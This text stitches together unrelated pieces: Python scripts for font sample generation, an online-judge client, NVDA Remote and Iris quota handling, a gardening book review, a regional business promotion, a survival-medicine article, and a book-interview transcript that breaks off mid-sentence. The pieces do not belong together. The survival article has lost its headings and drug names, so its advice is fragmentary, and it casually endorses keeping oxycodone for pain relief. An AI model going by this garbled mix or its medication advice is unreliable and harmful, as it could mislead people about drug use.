codepoints.append(0x08A0) chars = set() for cp in codepoints: chars.add(unichr(cp)) return frozenset(chars) _EXCLUDE_CHARS = _generate_excluded_characters() def generate_sample_for_script(script, loc_map): num_locales = len(loc_map) if num_locales == 1: tag, info = next(loc_map.items()) exemplars = info[2] ex_len = len(exemplars) info = "%s (1 locale)\nfrom exemplars for %s (%s%d chars)" % ( script, tag, "first 60 of " if ex_len > 60 else "", ex_len, ) # don't sort, rely on exemplar order sample = " ".join(exemplars[:60]) sample = addcase(sample, script) return sample, info script_tag = "-" + script char_to_lang_map = get_char_to_lang_map(loc_map) if len(char_to_lang_map) <= 60: info = "%s (%d locales)\nfrom merged exemplars (%d chars) from %s" % ( script, num_locales, len(char_to_lang_map), ", ".join([loc.replace(script_tag, "") for loc in loc_map]), ) sample = " ".join(sort_for_script(list(char_to_lang_map), script)) sample = addcase(sample, script) return sample, info # show_rarely_used_char_info(script, loc_map, char_to_lang_map) chars_by_num_langs, num_langs_to_num_chars = char_lang_info( num_locales, char_to_lang_map ) # show_char_use_info(chars_by_num_langs, char_to_lang_map) # show_shared_langs_hist(num_langs_to_num_chars) # show_tiers(chars_by_num_langs, 3, 40) shared_lang_threshold = min(7, num_locales) rare_chars, locs_with_rare_chars = get_rare_char_info( char_to_lang_map, shared_lang_threshold ) selected = select_rare_chars_for_loc( script, locs_with_rare_chars, shared_lang_threshold, char_to_lang_map ) # show_selected_rare_chars(selected) chars_by_num_langs = [cp for cp in chars_by_num_langs if cp not in _EXCLUDE_CHARS] chosen_chars = list(chars_by_num_langs)[-60:] rare_extension = [] for _, chars in selected: avail_chars = [ cp for cp in chars if cp not in chosen_chars and cp not in rare_extension and cp not in _EXCLUDE_CHARS ] rare_extension.extend( sorted(avail_chars)[:4] ) # vietnamese dominates latin otherwise if len(rare_extension) > 20: break chosen_chars = chosen_chars[: 60 - len(rare_extension)] chosen_chars.extend(rare_extension) info = ( "%s (%d locales)\n" "from most common exemplars plus chars specific to most-read languages" % (script, num_locales) ) sample = " ".join(sort_for_script(chosen_chars, script)) sample = addcase(sample, script) return sample, info def generate_samples(dstdir, imgdir, summary): if imgdir: imgdir = tool_utils.ensure_dir_exists(imgdir) print("writing images to %s" % imgdir) if dstdir: dstdir = tool_utils.ensure_dir_exists(dstdir) print("writing files to %s" % dstdir) verbose = summary script_map = get_script_to_exemplar_data_map() for script in sorted(script_map): sample, info = generate_sample_for_script(script, script_map[script]) if summary: print() print(info) print(sample) if imgdir: path = os.path.join(imgdir, "und-%s_chars.png" % script) print("writing image %s.png" % script) rtl = script in ["Adlm", "Arab", "Hebr", "Nkoo", "Syrc", "Tfng", "Thaa"] create_image.create_png( sample, path, font_size=34, line_spacing=40, width=800, rtl=rtl ) if dstdir: filename = "und-%s_chars.txt" % script print("writing data %s" % filename) filepath = os.path.join(dstdir, filename) with codecs.open(filepath, "w", "utf-8") as f: f.write(sample + "\n") def main(): default_dstdir = os.path.join(NOTO_TOOLS, "sample_texts") parser = argparse.ArgumentParser() parser.add_argument( "--dstdir", help="where to write samples (default %s)" % default_dstdir, default=default_dstdir, metavar="dir", ) parser.add_argument( "--imgdir", help="if defined, generate images in this dir", metavar="dir" ) parser.add_argument( "--save", help="write sample files in dstdir", action="store_true" ) parser.add_argument( "--summary", help="output list of samples and how they were generated", action="store_true", ) parser.add_argument( "--verbose", help="print warnings and extra info", action="store_true" ) args = parser.parse_args() if not args.save and not args.imgdir and not args.summary: print("nothing to do.") return if args.verbose: global _VERBOSE _VERBOSE = True generate_samples(args.dstdir if args.save else None, args.imgdir, args.summary) if __name__ == "__main__": locale.setlocale(locale.LC_COLLATE, "en_US.UTF-8") main()
It is always with delight and honour to receive a request to review a book, especially when connected with gardening. I was more than happy to say “yes please” when The Arum Publishing Group asked me to review Louise Curley’s book, The Cut Flower Patch. I follow Louise’s blog, the WellyWoman, so know of her love for plants and nature. Indeed on her “About Me” page she writes: “For some women, they’re happiest when their feet are ensconced in a pair of expensive Manolo Blahniks or Christian Louboutins, for me it’s a pair of mud-splattered wellies”. The Cut Flower Patch is her first book, due to be published by Frances Lincoln (www.franceslincoln.com | @Frances_Lincoln) on 6 March 2014, so I am privileged to have a preview. The Cut Flower Patch measures 19cms x 24cms and is a sensible sized book. My first impressions were matt textured cover and the size and font of the print, which is easy on the eye and I found comfortable to read. The next thing was the matt format and attractive photographs of varying sizes including full page photographs with mouthwatering ideas for displaying flowers. The colour reproduction is excellent making it a lovely book to look at. This is a comprehensive guide for anyone wanting to grow their own cut flowers, whether it be in a small raised bed or on an allotment. It takes you from the preparation of a site to plant layouts and a guide to annuals, biennials, bulbs, tubers and foliage, as well as detailed information and photos setting you on the path of starting off the growing of your flowers from the windowsill to sowing direct. Louise includes a chapter through the seasons with ideas on supplementing the cutting patch; particularly useful in the winter months. There is a beautiful full page photograph for winter with twigs of Viburnum Bodnantense “Dawn” displayed in an assortment of glass bottles which has made me hunt out some old bottles. Equally important to growing your own flowers is knowing the best way to show them off. As one would expect in a good book about cutting flowers, there is an informative chapter called ‘Arranging your Flowers’ with floristry guides and tips, supported again by a wealth of photos of beautiful flowers in an interesting assortment of jugs, jars and vases. One that caught my eye was a pewter tankard packed full of Scabious, Sweet Williams and grasses. Good maintenance, support ideas, feeding suggestions, including a recipe for Comfrey, and dealing with pests and diseases in an organic way are well covered. Louise also gives advice on the best way to cut your flowers to encourage further blooms and prepare them so that they last longer. Finally at the end of the book is the always useful sowing and planting calendar and cutting patch calendar. Try as I may, in order to give a well rounded review, I was unable to find anything about The Cut Flower Patch that I did not like. I am going to covet my copy because I know I will refer to it throughout the year for ideas and help. You can place an early order for your own copy, which I would thoroughly recommend. The Cut Flower Patch is published on 6 March 2014. To order The Cut Flower Patch at the discounted price of £16.00 including p&p* (RRP: £16.00), telephone 01903 828503 or email mailorders@lbsltd.co.uk and quote the offer code APG101. Please quote the offer code APG101 and include your name and address details. Posted on February 21, 2014 February 21, 2014 by Ronnie@Hurtledto60Posted in Book Review, Garden bloggingTagged Book Review, Louise Curley, The Cut Flower Patch. Thank you so much for your lovely review of my book. After all the hard work it really means a lot that you liked it so much. I am glad to find you blogging again and have just been catching up. How great to get a review copy of this book! It looks and sounds like my kind of thing. I have rather lost touch with the garden after a torrid winter (not quite like yours, not my health but my father’s and the sudden death of my mother). Perhaps I should try to re-engage.
import json from aiohttp import ClientSession, CookieJar from asyncio import CancelledError, Queue, get_event_loop from appdirs import user_config_dir from os import path from urllib.parse import urljoin from jd4.log import logger _CHUNK_SIZE = 32768 _CONFIG_DIR = user_config_dir('jd4') _COOKIES_FILE = path.join(_CONFIG_DIR, 'cookies') _COOKIE_JAR = CookieJar(unsafe=True) try: _COOKIE_JAR.load(_COOKIES_FILE) except FileNotFoundError: pass class VJ4Error(Exception): def __init__(self, name, message, *args): super().__init__(name, message, *args) self.name = name async def json_response_to_dict(response): if response.content_type != 'application/json': raise Exception('invalid content type ' + response.content_type) response_dict = await response.json() if 'error' in response_dict: error = response_dict['error'] raise VJ4Error(error.get('name', 'unknown'), error.get('message', ''), *error.get('args', [])) return response_dict class VJ4Session(ClientSession): def __init__(self, server_url): super().__init__(cookie_jar=_COOKIE_JAR) self.server_url = server_url def full_url(self, *parts): return urljoin(self.server_url, path.join(*parts)) async def get_json(self, relative_url, **kwargs): async with self.get(self.full_url(relative_url), headers={'accept': 'application/json'}, allow_redirects=False, params=kwargs) as response: return await json_response_to_dict(response) async def post_json(self, relative_url, **kwargs): async with self.post(self.full_url(relative_url), headers={'accept': 'application/json'}, allow_redirects=False, data=kwargs) as response: return await json_response_to_dict(response) async def judge_consume(self, handler_type): async with self.ws_connect(self.full_url('judge/consume-conn/websocket')) as ws: logger.info('Connected') queue = Queue() async def worker(): try: while True: request = await queue.get() await handler_type(self, request, ws).handle() except CancelledError: raise except Exception as e: logger.exception(e) await ws.close() worker_task = get_event_loop().create_task(worker()) try: while True: queue.put_nowait(await ws.receive_json()) except TypeError: pass logger.warning('Connection lost with code %s', ws.close_code) worker_task.cancel() try: await worker_task except CancelledError: pass async def judge_noop(self): await self.get_json('judge/noop') async def login(self, uname, password): logger.info('Login') await self.post_json('login', uname=uname, password=password) async def login_if_needed(self, uname, password): try: await self.judge_noop() logger.info('Session is valid') except VJ4Error as e: if e.name == 'PrivilegeError': await self.login(uname, password) await get_event_loop().run_in_executor( None, lambda: _COOKIE_JAR.save(_COOKIES_FILE)) else: raise async def judge_datalist(self, last): return await self.get_json('judge/datalist', last=last) async def problem_data(self, domain_id, pid, save_path): logger.info('Getting problem data: %s, %s', domain_id, pid) loop = get_event_loop() async with self.get(self.full_url('d', domain_id, 'p', pid, 'data'), headers={'accept': 'application/json'}) as response: if response.content_type == 'application/json': response_dict = await response.json() if 'error' in response_dict: error = response_dict['error'] raise VJ4Error(error.get('name', 'unknown'), error.get('message', ''), *error.get('args', [])) raise Exception('unexpected response') if response.status != 200: raise Exception('http error ' + str(response.status)) with open(save_path, 'wb') as save_file: while True: buffer = await response.content.read(_CHUNK_SIZE) if not buffer: break await loop.run_in_executor(None, save_file.write, buffer) async def record_pretest_data(self, rid): logger.info('Getting pretest data: %s', rid) async with self.get(self.full_url('records', rid, 'data'), headers={'accept': 'application/json'}) as response: if response.content_type == 'application/json': response_dict = await response.json() if 'error' in response_dict: error = response_dict['error'] raise VJ4Error(error.get('name', 'unknown'), error.get('message', ''), *error.get('args', [])) raise Exception('unexpected response') if response.status != 200: raise Exception('http error ' + str(response.status)) return await response.read()
If you are thinking about signing up for our AlbertaBusinessCounts program now is the time to do it. There are a number of new modules, features and enhancements for the ExecutivePulse CRM System. Many of these will impact you—regardless of how you use the CRM System. EDA believes business retention and expansion programs are best performed as a community driven activity to maximize local development of existing industry. Each community or region develops its own approaches to conduct business outreach. A robust CRM is an integral part of this approach. The AlbertaBusinessCounts (ABC) Program gives your community a consistent method for gathering the data needed to identify and analyze business needs at the local, regional and provincial level. Within our program is a series of free webinars designed to provide you with information and training relating to our AlbertaBusinessCounts Program. EDA holds the provincial master license for Executive Pulse, a software designed to collect and analyze data on existing industries in Alberta. A special licensing agreement enables EDA to make this software available to economic development organizations at a reduced price.
import os import wx from . import input import api import nvwave import tones import speech import ctypes import braille import inputCore try: from systemUtils import hasUiAccess except ModuleNotFoundError: from config import hasUiAccess import ui import versionInfo import logging logger = logging.getLogger('local_machine') def setSpeechCancelledToFalse(): """ This function updates the state of speech so that it is aware that future speech should not be cancelled. In the long term this is a fragile solution as NVDA does not support modifying the internal state of speech. """ if versionInfo.version_year >= 2021: # workaround as beenCanceled is readonly as of NVDA#12395 speech.speech._speechState.beenCanceled = False else: speech.beenCanceled = False class LocalMachine: def __init__(self): self.is_muted = False self.receiving_braille=False def play_wave(self, fileName): """Instructed by remote machine to play a wave file.""" if self.is_muted: return if os.path.exists(fileName): # ignore async / asynchronous from kwargs: # playWaveFile should play asynchronously from NVDA remote. nvwave.playWaveFile(fileName=fileName, asynchronous=True) def beep(self, hz, length, left, right, **kwargs): if self.is_muted: return tones.beep(hz, length, left, right) def cancel_speech(self, **kwargs): if self.is_muted: return wx.CallAfter(speech._manager.cancel) def speak( self, sequence, priority=speech.priorities.Spri.NORMAL, **kwargs ): if self.is_muted: return setSpeechCancelledToFalse() wx.CallAfter(speech._manager.speak, sequence, priority) def display(self, cells, **kwargs): if self.receiving_braille and braille.handler.displaySize > 0 and len(cells) <= braille.handler.displaySize: # We use braille.handler._writeCells since this respects thread safe displays and automatically falls back to noBraille if desired cells = cells + [0] * (braille.handler.displaySize - len(cells)) wx.CallAfter(braille.handler._writeCells, cells) def braille_input(self, **kwargs): try: inputCore.manager.executeGesture(input.BrailleInputGesture(**kwargs)) except inputCore.NoInputGestureAction: pass def set_braille_display_size(self, sizes, **kwargs): sizes.append(braille.handler.display.numCells) try: size=min(i for i in sizes if i>0) except ValueError: size = braille.handler.display.numCells braille.handler.displaySize = size braille.handler.enabled = bool(size) def send_key(self, vk_code=None, extended=None, pressed=None, **kwargs): wx.CallAfter(input.send_key, vk_code, None, extended, pressed) def set_clipboard_text(self, text, **kwargs): api.copyToClip(text=text) def send_SAS(self, **kwargs): """ This function simulates as "a secure attention sequence" such as CTRL+ALT+DEL. SendSAS requires UI Access, so we provide a warning when this fails. This warning will only be read by the remote NVDA if it is currently connected to the machine. """ if hasUiAccess(): ctypes.windll.sas.SendSAS(0) else: # Translators: Sent when a user fails to send CTRL+ALT+DEL from a remote NVDA instance ui.message(_("No permission on device to trigger CTRL+ALT+DEL from remote")) logger.warning("UI Access is disabled on this machine so cannot trigger CTRL+ALT+DEL")
What medicines do you truly need in your survival kit? The answer depends a lot on your own situation. And how do you get the supply you need of a prescription medication when you have to fight your insurance company? If you’re planning for a longer disaster or emergency situation, it’s a must-have antibiotic. Get the cream, rather than the ointment, because it heals faster and reduces scarring. You can also use neomycin or bacitracin zinc. They’re all great for mild to moderate injuries, aches, and pain relief. Aspirin carries the additional bonus of being healthy for your heart. This is your major pain relief medication. Be aware that you must be careful and wise in your use of oxycodone. It’s a heavily restricted major narcotic (and frequently gets sold on the street). But, it’s excellent if you’re planning for intense pain relief. This is your go-to for minor allergic reactions. Sneezing, coughing, wheezing, hives, and skin rash all succumb to Benadryl. The one con is the side effect: you will feel quite sleepy and tired after you take it. Benadryl can’t handle severe allergic reactions, which require a shot. This is a prescription-strength antifungal. It protects you from athlete’s foot, jock itch, and ringworm. So, yes. Having those medications available will protect you from many diseases and conditions which can affect you if you have to rough it for a while. Keep ‘em at your disposal.
# Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license. # See LICENSE in the project root for license information. from time import time from gevent import spawn, sleep from gevent.lock import Semaphore from collections import deque from datetime import datetime import iris.cache from iris import metrics import logging import ujson logger = logging.getLogger(__name__) get_application_quotas_query = '''SELECT `application`.`name` as application, `application_quota`.`hard_quota_threshold`, `application_quota`.`soft_quota_threshold`, `application_quota`.`hard_quota_duration`, `application_quota`.`soft_quota_duration`, `target`.`name` as target_name, `target_type`.`name` as target_role, `application_quota`.`plan_name`, `application_quota`.`wait_time` FROM `application_quota` JOIN `application` ON `application`.`id` = `application_quota`.`application_id` LEFT JOIN `target` on `target`.`id` = `application_quota`.`target_id` LEFT JOIN `target_type` on `target_type`.`id` = `target`.`type_id` ''' insert_application_quota_query = '''INSERT INTO `application_quota` (`application_id`, `hard_quota_threshold`, `soft_quota_threshold`, `hard_quota_duration`, `soft_quota_duration`, `plan_name`, `target_id`, `wait_time`) VALUES (:application_id, :hard_quota_threshold, :soft_quota_threshold, :hard_quota_duration, :soft_quota_duration, :plan_name, :target_id, :wait_time) ON DUPLICATE KEY UPDATE `hard_quota_threshold` = :hard_quota_threshold, `soft_quota_threshold` = :soft_quota_threshold, `hard_quota_duration` = :hard_quota_duration, `soft_quota_duration` = :soft_quota_duration, `plan_name` = :plan_name, `target_id` = :target_id, `wait_time` = :wait_time''' create_incident_query = '''INSERT INTO `incident` (`plan_id`, `created`, `context`, `current_step`, `active`, `application_id`) VALUES ((SELECT `plan_id` FROM `plan_active` WHERE `name` = :plan_name), :created, :context, 0, TRUE, :sender_app_id)''' check_incident_claimed_query = '''SELECT `active` FROM `incident` WHERE `id` = :id''' required_quota_keys = frozenset(['hard_quota_threshold', 'soft_quota_threshold', 'hard_quota_duration', 'soft_quota_duration', 'plan_name', 'wait_time', 'target_name']) quota_int_keys = ('hard_quota_threshold', 'soft_quota_threshold', 'hard_quota_duration', 'soft_quota_duration', 'wait_time') soft_quota_notification_interval = 1800 class ApplicationQuota(object): def __init__(self, db, expand_targets, message_send_enqueue, sender_app): self.db = db self.expand_targets = expand_targets self.message_send_enqueue = message_send_enqueue self.iris_application = None if sender_app: self.iris_application = iris.cache.applications.get(sender_app) if self.iris_application: logger.info('Using iris application (%s) for sender quota notifications.', sender_app) else: logger.error('Invalid iris application (%s) used for sender. Quota breach notificiations/incidents will not work.', sender_app) else: logger.warning('Iris sender_app not configured so notifications for quota breaches will not work') self.rates = {} # application: (hard_buckets, soft_buckets, hard_limit, soft_limit, wait_time, plan_name, (target_name, target_role)) self.last_incidents = {} # application: (incident_id, time()) self.last_incidents_mutex = Semaphore() self.last_soft_quota_notification_time = {} # application: time() self.last_soft_quota_notification_time_mutex = Semaphore() metrics.add_new_metrics({'quota_hard_exceed_cnt': 0, 'quota_soft_exceed_cnt': 0}) spawn(self.refresh) def get_new_rules(self): session = self.db.Session() for row in session.execute(get_application_quotas_query): yield row session.close() def refresh(self): while True: logger.info('Refreshing app quotas') new_rates = {} for application, hard_limit, soft_limit, hard_duration, soft_duration, target_name, target_role, plan_name, wait_time in self.get_new_rules(): new_rates[application] = (hard_limit, soft_limit, hard_duration / 60, soft_duration / 60, wait_time, plan_name, (target_name, target_role)) old_keys = self.rates.viewkeys() new_keys = new_rates.viewkeys() # Remove old application entries for key in old_keys - new_keys: logger.info('Pruning old application quota for %s', key) try: del(self.rates[key]) del(self.last_incidents[key]) except KeyError: pass # Create new ones with fresh buckets for key in new_keys - old_keys: hard_limit, soft_limit, hard_duration, soft_duration, wait_time, plan_name, target = new_rates[key] self.rates[key] = (deque([0] * hard_duration, maxlen=hard_duration), # hard buckets deque([0] * soft_duration, maxlen=soft_duration), # soft buckets hard_limit, soft_limit, wait_time, plan_name, target) # Update existing ones + append new time interval. Keep same time bucket object if duration hasn't changed, otherwise create new # one and resize accordingly for key in new_keys & old_keys: hard_limit, soft_limit, hard_duration, soft_duration, wait_time, plan_name, target = new_rates[key] self.rates[key] = (self.rates[key][0] if len(self.rates[key][0]) == hard_duration else deque(self.rates[key][0], maxlen=hard_duration), self.rates[key][1] if len(self.rates[key][1]) == soft_duration else deque(self.rates[key][1], maxlen=soft_duration), hard_limit, soft_limit, wait_time, plan_name, target) # Increase minute interval for hard + soft buckets self.rates[key][0].append(0) self.rates[key][1].append(0) metrics.add_new_metrics({'app_%s_quota_%s_usage_pct' % (app, quota_type): 0 for quota_type in ('hard', 'soft') for app in new_keys}) logger.info('Refreshed app quotas: %s', ', '.join(new_keys)) sleep(60) def allow_send(self, message): application = message.get('application') if not application: return True # Purpose of quotas is to protect downstreams. If we're already going to drop this message, # don't let it account against quota. if message.get('mode') == 'drop': return True rate = self.rates.get(application) if not rate: return True hard_buckets, soft_buckets, hard_limit, soft_limit, wait_time, plan_name, target = rate # Increment both buckets for this minute hard_buckets[-1] += 1 soft_buckets[-1] += 1 # If hard limit breached, disallow sending this message and create incident hard_quota_usage = sum(hard_buckets) hard_usage_pct = 0 if hard_limit > 0: hard_usage_pct = (hard_quota_usage / hard_limit) * 100 metrics.set('app_%s_quota_hard_usage_pct' % application, hard_usage_pct) if hard_quota_usage > hard_limit: metrics.incr('quota_hard_exceed_cnt') with self.last_incidents_mutex: self.notify_incident(application, hard_limit, len(hard_buckets), plan_name, wait_time) return False # If soft limit breached, just notify owner and still send soft_quota_usage = sum(soft_buckets) soft_usage_pct = 0 if soft_limit > 0: soft_usage_pct = (soft_quota_usage / soft_limit) * 100 metrics.set('app_%s_quota_soft_usage_pct' % application, soft_usage_pct) if soft_quota_usage > soft_limit: metrics.incr('quota_soft_exceed_cnt') with self.last_soft_quota_notification_time_mutex: self.notify_target(application, soft_limit, len(soft_buckets), *target) return True return True def notify_incident(self, application, limit, duration, plan_name, wait_time): if not self.iris_application: logger.warning('Application %s breached hard quota. Cannot notify owners as application is not set', application) return if not plan_name: logger.error('Application %s breached hard quota. Cannot create iris incident as plan is not set (may have been deleted).', application) return logger.warning('Application %s breached hard quota. Will create incident using plan %s', application, plan_name) session = self.db.Session() # Avoid creating new incident if we have an incident that's either not claimed or claimed and wait_time hasn't been exceeded last_incident = self.last_incidents.get(application) if last_incident: last_incident_id, last_incident_created = last_incident claimed = session.execute(check_incident_claimed_query, {'id': last_incident_id}).scalar() if claimed: logger.info('Skipping creating incident for application %s as existing incident %s is not claimed', application, last_incident_id) session.close() return if wait_time and (time() - last_incident_created) < wait_time: logger.info('Skipping creating incident for application %s as it is not yet %s seconds since existing incident %s was claimed', application, wait_time, last_incident_id) session.close() return # Make a new incident incident_data = { 'plan_name': plan_name, 'created': datetime.utcnow(), 'sender_app_id': self.iris_application['id'], 'context': ujson.dumps({ 'quota_breach': { 'application': application, 'limit': limit, 'duration': duration } }) } incident_id = session.execute(create_incident_query, incident_data).lastrowid session.commit() session.close() self.last_incidents[application] = incident_id, time() logger.info('Created incident %s', incident_id) def notify_target(self, application, limit, duration, target_name, target_role): if not self.iris_application: logger.warning('Application %s breached soft quota. Cannot notify owners as application is not set', application) return if not target_name or not target_role: logger.error('Application %s breached soft quota. Cannot notify owner as they aren\'t set (may have been deleted).', application) return last_notification_time = self.last_soft_quota_notification_time.get(application) now = time() if last_notification_time is not None and (now - last_notification_time) < soft_quota_notification_interval: logger.warning('Application %s breached soft quota. Will NOT notify %s:%s as they will only get a notification once every %s seconds.', application, target_role, target_name, soft_quota_notification_interval) return self.last_soft_quota_notification_time[application] = now logger.warning('Application %s breached soft quota. Will notify %s:%s', application, target_role, target_name) targets = self.expand_targets(target_role, target_name) if not targets: logger.error('Failed resolving %s:%s to notify soft quota breach.', target_role, target_name) return mode_id = iris.cache.modes.get('email') if not mode_id: logger.error('Failed resolving email mode to notify soft quota breach for application %s', application) return for username in targets: message = { 'application': self.iris_application['name'], 'mode_id': mode_id, 'mode': 'email', 'target': username, 'subject': 'Application %s exceeding message quota' % application, 'body': ('Hi %s\n\nYour application %s is currently exceeding its soft quota of %s messages per %s minutes.\n\n' 'If this continues, your messages will eventually be dropped on the floor and an Iris incident will be raised.\n\n' 'Regards,\nIris') % (username, application, limit, duration, ) } self.message_send_enqueue(message)
Mr. Cwiklik talked about his book House Rules: A Freshman Congressman's Initiation to the Backslapping, Backpedaling and Backstabbing Ways of Washington, published by Villard. He is a freelance writer and former editor for the Ottaway News Service who followed Nebraska Democrat Peter Hoagland through his campaign, election and first year in office. In the book, Mr. Cwiklik discussed some of the issues debated by the first session of the 102nd Congress, including the savings and loan bailout and the Congressional pay raise, and provided an inside look at the political process and the Washington establishment. He discussed how he got involved with the project and to what extent the experience helped shape his view of Congress. BRIAN LAMB, HOST: Robert Cwiklik, you have a new book out called "House Rules." What's it all about? ROBERT CWIKLIK, AUTHOR, "HOUSE RULES": Well, it's about the first year in office of a freshman congressman. And his name is Peter Hoagland. He's a Democrat from Omaha, Nebraska. LAMB: Why did you choose Mr. Hoagland? CWIKLIK: Well, really, any freshman congressman would have served our purposes, but the publishers wanted to go with a Democrat, since they're supposedly running the show here. And Congressman Hoagland won his race with, I think, a 3,000-vote victory margin. So we thought that would lend a little drama to the narrative. LAMB: Who are the publishers? CWIKLIK: Villard Books, which is a Random House subsidiary. LAMB: And did they come to you with this idea? CWIKLIK: Yeah. I was contacted by my agent. And she said, "Well, you know, they're looking for a Washington writer. You're a Washington writer, aren't you?" And so it was billed to me as a look at the human side of life on the Hill, and the idea was that a freshman congressman is still closer to an ordinary mortal than most people up here. So that to get in and perch on his shoulder might give people an idea of what it's like to become a member of the Washington establishment; how does that happen. LAMB: Peter Hoagland of Nebraska was first elected what year? CWIKLIK: I met him in March of '89 -- oh, wait a minute, I'm sorry -- in February of '89. And I began to, I guess, shadow him in early March and stayed fairly close intermittently. There were periods when I would hang around the office quite often and then periods when I would draw back when things up here calmed down a bit. LAMB: What were you doing for a living before you started following Mr. Hoagland around? CWIKLIK: Well, I was free-lance writing. I wrote several children's books. And, you know, the odd article here and there. But never written much about politics before. And that was also -- the idea was to get someone to write this who was fairly new at writing about politics. LAMB: Let me ask you a technical question. When I read the book, I kept looking for a picture somewhere of Peter Hoagland. And there is none in the book. What's the reason for that? CWIKLIK: Actually, I had several pictures that I wanted to put in the book, and I wanted -- there was one that I wanted to use on the cover. But if you know anything about publishing, the author's advice is the last thing that they want when they're facing those kind of, you know, vital questions. So they decided that they wanted this sort of Capitol Hill power kind of look, you know, with the dome floating in the background there. LAMB: So there was never any thought of having the picture from the publisher's standpoint. CWIKLIK: As far as -- well, they told me that they were giving it some thought, but I think that was just to make me feel better. LAMB: All right. Describe Peter Hoagland then. CWIKLIK: Well, he's a very soft-spoken, conscientious guy. I think he tends to take a kind of an intellectual approach to politics. I think that was one of -- among his main attractions to his public life was a real strong interest in issues and in working out plausible solutions to immense problems, appeals to his type of guy. CWIKLIK: He was born in Omaha to a fairly prominent local family. There was -- the Hoagland Lumber Company was one of the bigger presences in the local business community. And on his mother's side, there was the Carpenter Paper Company. So these are two well-established institutions that he was born amidst. CWIKLIK: His family was very solidly Republican. LAMB: Was he ever a Republican? CWIKLIK: He was most of his early life. Actually, it came as a bit of a shock when he changed. It was a bit of a shock to his family. He was back home after having gone to law school and he lived in Washington as a public defender for a few years. And then he married and went back home and was working on the sly on the campaign for a Democrat, a local Democrat. I forget what kind of office it was. And his mother approached him one day and said that she'd heard a rumor that he was a Democrat. And the way his wife recalled the story to me, it sounded as if his mother said "Democrat" like someone might say "drug addict." They were none too pleased about that. CWIKLIK: He went to Stanford undergraduate and Yale Law School. LAMB: Was he a top student? CWIKLIK: I think he was a good student. I don't remember specifically any honors or anything like that. But I wouldn't be surprised. LAMB: At some point -- I don't know whether I wrote it down or not -- in the book you talked about the number of members of the House who had been to Harvard -- graduated, also to Yale. And then I think you said five of those had gone to both schools. Was it, like, 50-some to Harvard and 20-some to Yale? CWIKLIK: Yeah. I wrote away to all the schools I mention there and got -- they have -- they are very proud of their prestigious alumni. And, yeah, there are quite a few that come from Ivy League schools. But anybody that's hanging around Capitol Hill knows that that's not only in Congress, but in the bureaucracies, there's just a whole lot of people from Ivy League schools. LAMB: So it really doesn't matter to you or to the publisher that it was Peter Hoagland. It could have been Tom Smith. CWIKLIK: Well, in fact, my first choice was a Republican, whose name I guess it wouldn't be fair to mention. It would be sort of blind-siding him. And they said that yeah, that would be kind of nice, but, you know, it was kind of like the picture on the cover idea. They have their own set idea of what this book would be, and they thought a majority party person would be much more revealing. LAMB: Do you have any more on how they actually selected Peter Hoagland? CWIKLIK: Well, I made the actual selection, and there was nothing very scientific about it. I'm sure you're familiar with -- the Congressional Quarterly does this roundup of the elections and they print these mug shots all across the page of all the new members. And I took a look at all those and I read what limited information there was there, and said, "Well, I think this guy looks pretty good." LAMB: How much access did you have to him? CWIKLIK: Well, I had quite a bit of access to the office. I mean, I could basically come in when I wanted to. I wasn't admitted to all meetings, but enough to get a good idea of how things worked. And it's hard to have much access to things like caucuses and there's a lot of members-only stuff going on on the Hill. So to get an idea of what happened in there, I would just have to depend on him to recreate certain scenes for me. And you know how -- these guys are very busy, so there was often just no time to do that. I mean, we'd be running down the hall together. I'm saying, "So, you know, what did it feel like in there? What did this guy say to you?" And he's got eight different agendas going at once. So that was a challenge for a while. LAMB: What was the first thing you noticed about a congressman -- a freshman congressman -- that got your attention? You say you hadn't covered much of Congress. CWIKLIK: Well, I was kind of amazed that anyone would want this job, for one thing. I mean, it's just really drudgery. Maybe it was the particular year that he came in, with the S&L bailout landing on his desk with a thud as soon as he got here. I mean, there's just piles and piles of this deadening regulatory jargon that you've got to wade through and try to make some sense out of it and you had to mark up in two weeks, and you've got to be able to vote with, you know, some degree of intelligence on these ridiculously huge issues. There was a lot of pressure early on. Besides that, you know, he's got a big debt from his campaign, so he's got to raise a lot of money. And he's got a campaign coming up, and he's sure somebody's going to challenge him if he only won by 3,000 votes, so there's a pressure every weekend to fly back home and to meet with, you know, all kinds of different groups and just speak and to, you know, just shuttle everywhere and do everything at once. So it just doesn't look like a hell of a lot of fun to me. LAMB: Has he told you what he thinks of this book? CWIKLIK: Yeah. He's not crazy about it. CWIKLIK: Well, he says that it's cynical, and he says that it's unfair. But I tend to think -- I mean, I've had various readings on that. I've just read a review in the Washington Monthly where the gentleman writing it says exactly the opposite. He says the narrative exhibits remarkable fair-mindedness. So there's two opposite poles. I mean, I think it's fair. And I try to present both sides on any given issue. But I think that the career of a freshman congressman is such that it's bound to look a little fishy if you look too closely. LAMB: He's in his second term now. LAMB: How big did he win the first term? CWIKLIK: He won his first election by 3,000 votes. CWIKLIK: And the second term he won 58 percent of the vote. He was -- it was a landslide. LAMB: The district, though, has been traditionally over the years Republican? CWIKLIK: Yes. Well, it's funny because there's a Democratic majority, but Republicans consistently have won there. He was the first Democrat to win in quite some time. LAMB: After you wrote the book -- by the way, what was the publication date on it? CWIKLIK: It just came out yesterday, I think. LAMB: And when you had the first copy, did you go to him and say, "Mr. Congressman, here's a copy of the book on you"? CWIKLIK: Well, no. We had an agreement that I would give him a manuscript before publication so that he could review it and tell me if he thought I made any errors in time for me to make changes that I felt were appropriate. And so that's what we did. We sent him a manuscript, and he sent us back a few comments. LAMB: Were there corrections that he tried to make that you went along with? CWIKLIK: There were some, yeah. And there were many that I didn't. LAMB: What kind of things did he want you to change that you didn't? CWIKLIK: That I didn't? Well, for example, at one point in the book in a kind of breezy section about his biography, I was talking about what he had done in college and how he got started in politics. I, in passing, mentioned that he served in the military -- I forget the years. I think it was '62 and '63. And then I said "wartime," as he later put it in a campaign brochure. But he served stateside; he was never in the Army, and it looked a little bit like he was trying to make it appear as if he was in combat. And there was a picture on the brochure with him in battle fatigues next to a couple of other guys and they had, like, a tank behind them or something. And so he asked me to take that out. He said that brochure didn't exist. And, you know, I had the brochure. So I had to disagree with him on that, on the question of its existence. LAMB: Is Congressman Peter Hoagland, in your opinion, an honest man? CWIKLIK: I think so, though I've had my doubts lately about his relationship to the facts. But I think he's feeling some pressure. Congressmen get nervous when a negative ad is aired or when even a slightly negative story in the press appears. So I can imagine an entire book would be the subject of, you know, just paroxysms. LAMB: Was this book written about in Omaha? CWIKLIK: Yeah, there was an article about it just before Christmas. And it was basically a "he said, then I said," you know, not very much. LAMB: ... and to what's said in the Omaha daily newspaper. CWIKLIK: And I 